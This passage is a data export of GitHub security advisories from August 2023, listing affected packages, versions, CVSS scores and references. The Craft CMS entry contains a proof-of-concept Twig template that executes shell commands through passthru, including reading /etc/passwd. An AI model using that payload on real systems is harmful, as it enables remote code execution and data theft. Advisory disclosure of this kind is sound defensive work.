publication of this advisory, there is no fix.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:gogs-webhook'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40349'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-2894'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]","{'cwe_ids': ['CWE-665'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:04:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-8x8h-hcq8-jwwx,2023-08-31T18:25:08Z,2023-08-25T18:38:18Z,,['CVE-2023-32077'],Netmaker has Hardcoded DNS Secret Key,"### Impact Hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints. ### Patches Issue is patched in 0.17.1, and fixed in 0.18.6+. If Users are using 0.17.1, they should run ""docker pull gravitl/netmaker:v0.17.1"" and ""docker-compose up -d"". This will switch them to the patched users If users are using v0.18.0-0.18.5, they should upgrade to v0.18.6 or later. ### Workarounds If using 0.17.1, can just pull the latest docker image of backend and restart server. ### References Credit to Project Discovery, and in particular https://github.com/rootxharsh , https://github.com/iamnoooob, and https://github.com/projectdiscovery ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/gravitl/netmaker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.1'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/gravitl/netmaker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.18.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gravitl/netmaker/security/advisories/GHSA-8x8h-hcq8-jwwx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32077'}, {'type': 'WEB', 'url': 'https://github.com/gravitl/netmaker/pull/2170'}, {'type': 'WEB', 'url': 'https://github.com/gravitl/netmaker/commit/1621c27c1d176b639e9768b2acad7693e387fd51'}, {'type': 'WEB', 'url': 'https://github.com/gravitl/netmaker/commit/9362c39a9a822f0e07361aa7c77af2610597e657'}, {'type': 'PACKAGE', 'url': 'https://github.com/gravitl/netmaker'}]","{'cwe_ids': ['CWE-321', 'CWE-798'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T18:38:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-9v66-9239-cqv2,2023-08-23T20:07:24Z,2023-08-17T21:30:53Z,,['CVE-2023-38905'],Jeecg-boot SQL Injection vulnerability,"SQL injection vulnerability in Jeecg-boot v.3.5.0 and before allows a local attacker to cause a denial of service via the `Benchmark`, `PG_Sleep`, `DBMS_Lock.Sleep`, `Waitfor`, `DECODE`, and `DBMS_PIPE.RECEIVE_MESSAGE` functions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-parent'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38905'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/4737'}, {'type': 'WEB', 'url': 'https://gist.github.com/wealeson1/e24fc8575f4e051320d69e9a75080642'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-18T21:51:47Z', 'nvd_published_at': None}" 1.4.0,GHSA-44wr-rmwq-3phw,2023-08-23T22:14:58Z,2023-08-21T19:58:04Z,,['CVE-2023-40035'],Craft CMS vulnerable to Remote Code Execution via validatePath bypass,"### Summary Bypassing the validatePath function can lead to potential Remote Code Execution (Post-authentication, ALLOW_ADMIN_CHANGES=true) ### Details In bootstrap.php, the SystemPaths path is set as below. ```php // Set the vendor path. By default assume that it's 4 levels up from here $vendorPath = $findConfigPath('--vendorPath', 'CRAFT_VENDOR_PATH') ?? dirname(__DIR__, 3); // Set the ""project root"" path that contains config/, storage/, etc. By default assume that it's up a level from vendor/. $rootPath = $findConfigPath('--basePath', 'CRAFT_BASE_PATH') ?? dirname($vendorPath); // By default the remaining directories will be in the base directory $dotenvPath = $findConfigPath('--dotenvPath', 'CRAFT_DOTENV_PATH') ?? ""$rootPath/.env""; $configPath = $findConfigPath('--configPath', 'CRAFT_CONFIG_PATH') ?? ""$rootPath/config""; $contentMigrationsPath = $findConfigPath('--contentMigrationsPath', 'CRAFT_CONTENT_MIGRATIONS_PATH') ?? ""$rootPath/migrations""; $storagePath = $findConfigPath('--storagePath', 'CRAFT_STORAGE_PATH') ?? ""$rootPath/storage""; $templatesPath = $findConfigPath('--templatesPath', 'CRAFT_TEMPLATES_PATH') ?? ""$rootPath/templates""; $translationsPath = $findConfigPath('--translationsPath', 'CRAFT_TRANSLATIONS_PATH') ?? ""$rootPath/translations""; $testsPath = $findConfigPath('--testsPath', 'CRAFT_TESTS_PATH') ?? ""$rootPath/tests""; ``` Because paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir() ```php /** * @param string $attribute * @param array|null $params * @param InlineValidator $validator * @return void * @since 4.4.6 */ public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void { // Make sure it’s not within any of the system directories $path = FileHelper::absolutePath($this->getRootPath(), '/'); $systemDirs = Craft::$app->getPath()->getSystemPaths(); foreach ($systemDirs as $dir) { $dir = FileHelper::absolutePath($dir, '/'); if (str_starts_with(""$path/"", ""$dir/"")) { $validator->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.')); break; } } } ``` ref. https://www.php.net/manual/en/wrappers.file.php ### PoC 1) Create a new filesystem. **Base Path: file:///var/www/html/templates** ![1](https://user-images.githubusercontent.com/30969523/249252853-5cde9bae-9279-428a-972b-d4444c545819.png) 2) Create a new asset volume. Asset Filesystem: local_bypass ![2](https://user-images.githubusercontent.com/30969523/249256711-e37da7f8-52d6-4ecc-bfc4-b9b9d8a2230d.png) 3) Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates ```twig {{'
'}}
{{1337*1337}}
{{['cat /etc/passwd']|map('passthru')|join}}
{{['id;pwd;ls -altr /']|map('passthru')|join}}
```
![3](https://user-images.githubusercontent.com/30969523/249256731-8dafc3dc-4937-4f69-bba0-97bc96be1ada.png)
![4](https://user-images.githubusercontent.com/30969523/249257369-54e22aff-3919-4a21-b696-a7be74086ff9.png)


4) Create a new route. URI: * , Template: poc.ttml

![5](https://user-images.githubusercontent.com/30969523/249257437-972ec725-8197-4472-9b57-750ab91d9bfd.png)


5) Confirm RCE on arbitrary path ( /* )

![6](https://user-images.githubusercontent.com/30969523/249257465-061dbaf8-a2c6-4366-80f5-986a15bad748.png)


#### PoC Env

![0628 env](https://user-images.githubusercontent.com/30969523/249252784-6e5913ad-9ad1-4d3a-a70f-2c5ff9f55166.png)


### Impact
Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)
","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-RC1'}, {'fixed': '4.4.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.4.14'}}, {'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.8.15'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.8.14'}}]","[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-44wr-rmwq-3phw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40035'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/0bd33861abdc60c93209cff03eeee54504d3d3b5'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/releases/tag/3.8.15'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/releases/tag/4.4.15'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T19:58:04Z', 'nvd_published_at': None}"
1.4.0,GHSA-223m-pgcq-f3xg,2023-08-22T17:56:45Z,2023-08-22T00:31:11Z,,['CVE-2023-4303'],Jenkins Fortify Plugin HTML injection vulnerability,"Jenkins Fortify Plugin 22.1.38 and earlier does not escape the error message for a form validation method. This results in an HTML injection vulnerability.

Fortify Plugin 22.2.39 removes HTML tags from the error message.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:fortify'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '22.2.39'}]}], 'database_specific': {'last_known_affected_version_range': '<= 22.1.38'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4303'}, {'type': 'WEB', 'url': 'https://github.com/jenkinsci/fortify-plugin/commit/357d7bfbcb0ff796ea7d078bee13159f1d000f5d'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/fortify-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3140'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-22T17:56:45Z', 'nvd_published_at': None}"
1.4.0,GHSA-5x64-925v-h4gv,2023-08-18T15:48:16Z,2023-08-11T15:30:46Z,,['CVE-2020-35141'],FaucetSDN Ryu Denial of Service Vulnerability,"An issue was discovered in `OFPQueueGetConfigReply` in `parser.py` in FaucetSDN Ryu version 4.34, allows remote attackers to cause a denial of service (DoS) (infinite loop).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ryu'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.34'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35141'}, {'type': 'WEB', 'url': 'https://github.com/faucetsdn/ryu/issues/118'}, {'type': 'PACKAGE', 'url': 'https://github.com/faucetsdn/ryu'}]","{'cwe_ids': ['CWE-770', 'CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T22:03:46Z', 'nvd_published_at': None}"
1.4.0,GHSA-fh2r-99q2-6mmg,2023-09-19T22:28:38Z,2023-08-22T18:06:15Z,,[],rustls-webpki: CPU denial of service in certificate path building,"When this crate is given a pathological certificate chain to validate, it will spend CPU time exponential with the number of candidate certificates at each step of path building.

Both TLS clients and TLS servers that accept client certificate are affected.

We now give each path building operation a budget of 100 signature verifications.

The original `webpki` crate is also affected, see [GHSA-8qv2-5vq6-g2g7](https://github.com/advisories/GHSA-8qv2-5vq6-g2g7).

This was previously reported in the original crate  and re-reported to us recently.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'rustls-webpki'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.100.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'rustls-webpki'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.101.0'}, {'fixed': '0.101.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rustls/webpki/commit/4ea052366f342a06344aab589565179b59b342d3'}, {'type': 'WEB', 'url': 'https://github.com/rustls/webpki/commit/dcad2406c92169b72c110dd12183fcc74035b683'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-8qv2-5vq6-g2g7'}, {'type': 'PACKAGE', 'url': 'https://github.com/rustls/webpki'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0053.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-22T18:06:15Z', 'nvd_published_at': None}"
1.4.0,GHSA-ffw3-6378-cqgp,2023-08-01T19:44:27Z,2023-08-01T03:31:17Z,,['CVE-2023-4033'],mlflow vulnerable to OS Command Injection,OS Command Injection in GitHub repository mlflow/mlflow prior to 2.6.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'mlflow'}, 'ecosystem_specific': {'affected_functions': ['mlflow.pyfunc.backend.PyFuncBackend.predict']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4033'}, {'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/commit/6dde93758d42455cb90ef324407919ed67668b9b'}, {'type': 'PACKAGE', 'url': 'https://github.com/mlflow/mlflow'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5312d6f8-67a5-4607-bd47-5e19966fa321'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T19:44:27Z', 'nvd_published_at': None}"
1.4.0,GHSA-xvv9-5j67-3rpq,2023-08-22T18:39:53Z,2023-08-14T03:30:32Z,,['CVE-2023-40274'],zola Path Traversal vulnerability,"An issue was discovered in zola 0.13.0 through 0.17.2. The custom implementation of a web server, available via the ""zola serve"" command, allows directory traversal. The `handle_request` function, used by the server to process HTTP requests, does not account for sequences of special path control characters (`../`) in the URL when serving a file, which allows one to escape the webroot of the server and read arbitrary files from the filesystem.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'zola'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.13.0'}, {'last_affected': '0.17.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40274'}, {'type': 'WEB', 'url': 'https://github.com/getzola/zola/issues/2257'}, {'type': 'WEB', 'url': 'https://github.com/getzola/zola/pull/2258'}, {'type': 'PACKAGE', 'url': 'https://github.com/getzola/zola'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:33:07Z', 'nvd_published_at': None}"
1.4.0,GHSA-2qc8-r663-v864,2023-08-18T19:22:58Z,2023-08-11T18:31:49Z,,['CVE-2023-0871'],OpenNMS Horizon XXE Injection Vulnerability,"XXE injection in `/rtc/post/ endpoint` in OpenNMS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to XML external entity (XXE) injection, which can be used for instance to force Horizon to make arbitrary HTTP requests to internal and external services. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.
","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms.core:org.opennms.core.xml'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '31.0.8'}, {'fixed': '32.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0871'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6355'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/5a3b0b62e0c612c9e2aa2c91c847abec71d767d5'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/horizon/32/releasenotes/changelog.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T23:04:51Z', 'nvd_published_at': None}"
1.4.0,GHSA-m2f8-v8q4-3m59,2023-09-01T21:36:28Z,2023-08-11T03:30:21Z,,['CVE-2023-27506'],Authenticated Local Privilege Escalation vulnerability in Intel Optimization for Tensorflow,Improper buffer restrictions in the Intel(R) Optimization for Tensorflow software before version 2.12 may allow an authenticated user to potentially enable escalation of privilege via local access.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'intel-tensorflow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.12'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-intel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.12'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'intel-tensorflow-avx512'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27506'}, {'type': 'WEB', 'url': 'http://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00840.html'}]","{'cwe_ids': ['CWE-119'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-01T21:36:28Z', 'nvd_published_at': None}"
1.4.0,GHSA-9rww-66w7-7vjx,2023-08-11T21:58:15Z,2023-08-11T09:30:36Z,,['CVE-2023-4108'],Mattermost fails to sanitize post metadata,"Mattermost fails to sanitize post metadata during audit logging, resulting in permalinks' contents being logged.
","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.8.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.8.7'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.9.0'}, {'fixed': '7.9.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.9.5'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/mattermost/mattermost-server/v6'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.10.0'}, {'fixed': '7.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4108'}, {'type': 'PACKAGE', 'url': 'https://github.com/mattermost/mattermost'}, {'type': 'WEB', 'url': 'https://mattermost.com/security-updates'}]","{'cwe_ids': ['CWE-200', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T21:58:15Z', 'nvd_published_at': None}"
1.4.0,GHSA-jm7r-4pg6-gf26,2023-08-31T18:55:02Z,2023-08-25T21:30:47Z,,['CVE-2023-24621'],Esoteric YamlBeans Unsafe Deserialization vulnerability,"An issue was discovered in Esoteric YamlBeans through 1.15. It allows untrusted deserialisation to Java classes by default, where the data and class are controlled by the author of the YAML document being processed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.esotericsoftware.yamlbeans:yamlbeans'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24621'}, {'type': 'WEB', 'url': 'https://contrastsecurity.com'}, {'type': 'WEB', 'url': 'https://github.com/Contrast-Security-OSS/yamlbeans/blob/main/SECURITY.md'}, {'type': 'WEB', 'url': 'https://github.com/EsotericSoftware'}, {'type': 'PACKAGE', 'url': 'https://github.com/EsotericSoftware/yamlbeans'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T22:03:42Z', 'nvd_published_at': None}"
1.4.0,GHSA-9rmf-6qgj-g3wj,2023-08-11T19:46:03Z,2023-08-11T03:30:19Z,,['CVE-2023-4304'],Froxlor vulnerable to business logic errors,Business Logic Errors in GitHub repository froxlor/froxlor prior to 2.0.22,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froxlor/froxlor'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4304'}, {'type': 'WEB', 'url': 'https://github.com/froxlor/froxlor/commit/ce9a5f97a3edb30c7d33878765d3c014a6583597'}, {'type': 'PACKAGE', 'url': 'https://github.com/Froxlor/Froxlor'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/59fe5037-b253-4b0f-be69-1d2e4af8b4a9'}]","{'cwe_ids': ['CWE-284', 'CWE-862'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T19:46:03Z', 'nvd_published_at': None}"
1.4.0,GHSA-7c28-wg7r-pg6f,2023-08-04T13:31:46Z,2023-08-01T15:30:30Z,,['CVE-2022-39986'],RaspAP Command Injection vulnerability,A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the `cfg_id` parameter in `/ajax/openvpn/activate_ovpncfg.php` and `/ajax/openvpn/del_ovpncfg.php`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'billz/raspap-webgui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'last_affected': '2.8.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-39986'}, {'type': 'PACKAGE', 'url': 'https://github.com/RaspAP/raspap-webgui'}, {'type': 'WEB', 'url': 'https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php'}, {'type': 'WEB', 'url': 'https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-01T19:57:57Z', 'nvd_published_at': None}"
1.4.0,GHSA-gwqq-6vq7-5j86,2023-08-09T20:37:47Z,2023-08-05T03:30:19Z,,['CVE-2023-36095'],langchain Code Injection vulnerability,"An issue in Harrison Chase langchain allows an attacker to execute arbitrary code via the PALChain,from_math_prompt(llm).run in the python exec method.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.236'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36095'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/issues/5872'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/pull/6003'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/pull/7870'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/commit/8ba9835b925473655914f63822775679e03ea137'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/commit/e294ba475a355feb95003ed8f1a2b99942509a9e'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain'}, {'type': 'PACKAGE', 'url': 'https://github.com/langchain-ai/langchain'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/commits/v0.0.236?after=4d8b48bdb3f17c764c5c2e3c7140071603869e74+34&branch=v0.0.236&qualified_name=refs%2Ftags%2Fv0.0.236'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-138.yaml'}, {'type': 'WEB', 'url': 'http://langchain.com'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T14:11:52Z', 'nvd_published_at': None}"
1.4.0,GHSA-256m-j5qw-38f4,2023-08-25T18:41:16Z,2023-08-25T18:41:16Z,,['CVE-2023-32078'],Netmaker IDOR Allows User to Update Other User's Password,"### Impact
An IDOR vulnerability was found in the user update function. By specifying another user's username it is possible to update the other user's password.

### Patches
Issue is patched in 0.17.1, and fixed in 0.18.6+.

If Users are using 0.17.1, they should run ""docker pull gravitl/netmaker:v0.17.1"" and ""docker-compose up -d"". This will switch them to the patched users

If users are using v0.18.0-0.18.5, they should upgrade to v0.18.6 or later.

### Workarounds
If using 0.17.1, can just pull the latest docker image of backend and restart server.

### References
Credit to Project Discovery, and in particular https://github.com/rootxharsh , https://github.com/iamnoooob, and https://github.com/projectdiscovery","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/gravitl/netmaker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.1'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/gravitl/netmaker'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.18.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gravitl/netmaker/security/advisories/GHSA-256m-j5qw-38f4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32078'}, {'type': 'WEB', 'url': 'https://github.com/gravitl/netmaker/pull/2158'}, {'type': 'WEB', 'url': 'https://github.com/gravitl/netmaker/commit/b3be57c65bf0bbfab43b66853c8e3637a43e2839'}, {'type': 'PACKAGE', 'url': 'https://github.com/gravitl/netmaker'}]","{'cwe_ids': ['CWE-639'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T18:41:16Z', 'nvd_published_at': None}"
1.4.0,GHSA-rwpg-4c4c-v3r4,2023-08-21T20:47:10Z,2023-08-21T12:30:19Z,2023-08-21T20:47:10Z,[],Duplicate Advisory: Wallabag user can reset data unintentionally,"## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-p8gp-899c-jvq9. This link is maintained to preserve external references.

## Original Description
